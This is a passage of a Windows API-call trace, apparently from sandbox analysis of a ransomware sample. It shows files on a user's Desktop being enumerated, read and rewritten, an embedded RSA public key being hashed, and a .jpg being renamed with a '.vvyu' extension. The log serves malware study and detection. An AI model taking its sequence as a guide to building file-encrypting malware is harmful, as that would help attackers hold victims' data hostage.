hHeap=0x620000) returned 1 [0192.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93780 [0192.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0192.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93750 [0192.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93738 [0192.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93798 [0192.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93738 | out: hHeap=0x620000) returned 1 [0192.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93738 [0192.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93750 | out: hHeap=0x620000) returned 1 [0192.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0192.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93708 | out: hHeap=0x620000) returned 1 [0192.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93708 [0192.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea0a68 [0192.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93768 | out: hHeap=0x620000) returned 1 [0192.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0192.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93798 | out: hHeap=0x620000) returned 1 [0192.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea0c78 [0192.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0192.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0192.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93708 | out: hHeap=0x620000) returned 1 [0192.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea0e90 [0192.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0c78 | out: hHeap=0x620000) returned 1 [0192.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e90 | out: hHeap=0x620000) returned 1 [0192.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93738 | out: hHeap=0x620000) returned 1 [0192.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93780 | out: hHeap=0x620000) returned 1 [0192.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93720 | out: hHeap=0x620000) returned 1 [0192.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936f0 | out: hHeap=0x620000) returned 1 [0192.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936d8 | out: hHeap=0x620000) returned 1 [0192.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e955c0 | out: hHeap=0x620000) returned 1 [0192.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0192.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.959] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x18aa0, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x18aa0, lpOverlapped=0x0) returned 1 [0192.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0192.960] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x18aa5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.960] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea0a68 [0192.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea0a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea0e98 [0192.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0192.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.961] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea0e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e98 | out: hHeap=0x620000) returned 1 [0192.962] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.962] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.962] CloseHandle (hObject=0x568) returned 1 [0192.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea0a68 [0192.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.964] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\RwqiCW2QitXLv4.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\rwqicw2qitxlv4.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\RwqiCW2QitXLv4.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\rwqicw2qitxlv4.jpg.vvyu")) returned 1 [0192.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0192.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.967] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.969] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44854050, ftCreationTime.dwHighDateTime=0x1d896da, ftLastAccessTime.dwLowDateTime=0xc153cac0, ftLastAccessTime.dwHighDateTime=0x1d897f7, ftLastWriteTime.dwLowDateTime=0xc153cac0, ftLastWriteTime.dwHighDateTime=0x1d897f7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sj76aMesI3jmtOuE2hz", cAlternateFileName="SJ76AM~1")) returned 1 [0192.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0192.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa8) returned 0x2c6ead8 [0192.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0192.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0192.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac90 [0192.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0192.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0192.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0192.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0192.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0192.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0192.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0192.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.972] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8924cf0, ftCreationTime.dwHighDateTime=0x1d8989c, ftLastAccessTime.dwLowDateTime=0xc756cb0, ftLastAccessTime.dwHighDateTime=0x1d89b0a, ftLastWriteTime.dwLowDateTime=0xc756cb0, ftLastWriteTime.dwHighDateTime=0x1d89b0a, nFileSizeHigh=0x0, nFileSizeLow=0x6177, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tHLd WYzw.ots", cAlternateFileName="THLDWY~1.OTS")) returned 1 [0192.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e955c0 [0192.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0192.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e955c0 | out: hHeap=0x620000) returned 1 [0192.972] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\tHLd WYzw.ots") returned=".ots" [0192.973] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\tHLd WYzw.ots" (normalized: "c:\\users\\keecfmwgj\\desktop\\thld wyzw.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.973] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=24951) returned 1 [0192.973] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.975] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x6151, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.975] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.978] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.978] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x6177, lpOverlapped=0x0) returned 1 [0192.979] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.979] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.979] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.979] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.981] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.981] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.981] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.981] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.981] GetLastError () returned 0x0 [0192.981] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.981] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.982] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.982] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.982] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6180) returned 0x2ea0a68 [0192.982] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e955c0 [0192.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936d8 [0192.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95608 [0192.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936f0 [0192.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93720 [0192.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93780 [0192.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93738 [0192.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0192.983] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0192.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6bf0 [0192.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93720 | out: hHeap=0x620000) returned 1 [0192.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93738 | out: hHeap=0x620000) returned 1 [0192.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93780 | out: hHeap=0x620000) returned 1 [0192.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6bf0 | out: hHeap=0x620000) returned 1 [0192.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93780 [0192.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0192.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93738 [0192.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93720 [0192.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0192.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0192.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0192.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0192.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0192.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93738 | out: hHeap=0x620000) returned 1 [0192.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93720 | out: hHeap=0x620000) returned 1 [0192.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93780 | out: hHeap=0x620000) returned 1 [0192.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0192.986] GetCurrentThreadId () returned 0x66c [0192.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9eb10 [0192.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.986] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.987] GetCurrentThreadId () returned 0x66c [0192.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.987] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.987] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.987] RtlAllocateHeap (HeapHandle=0x620000, 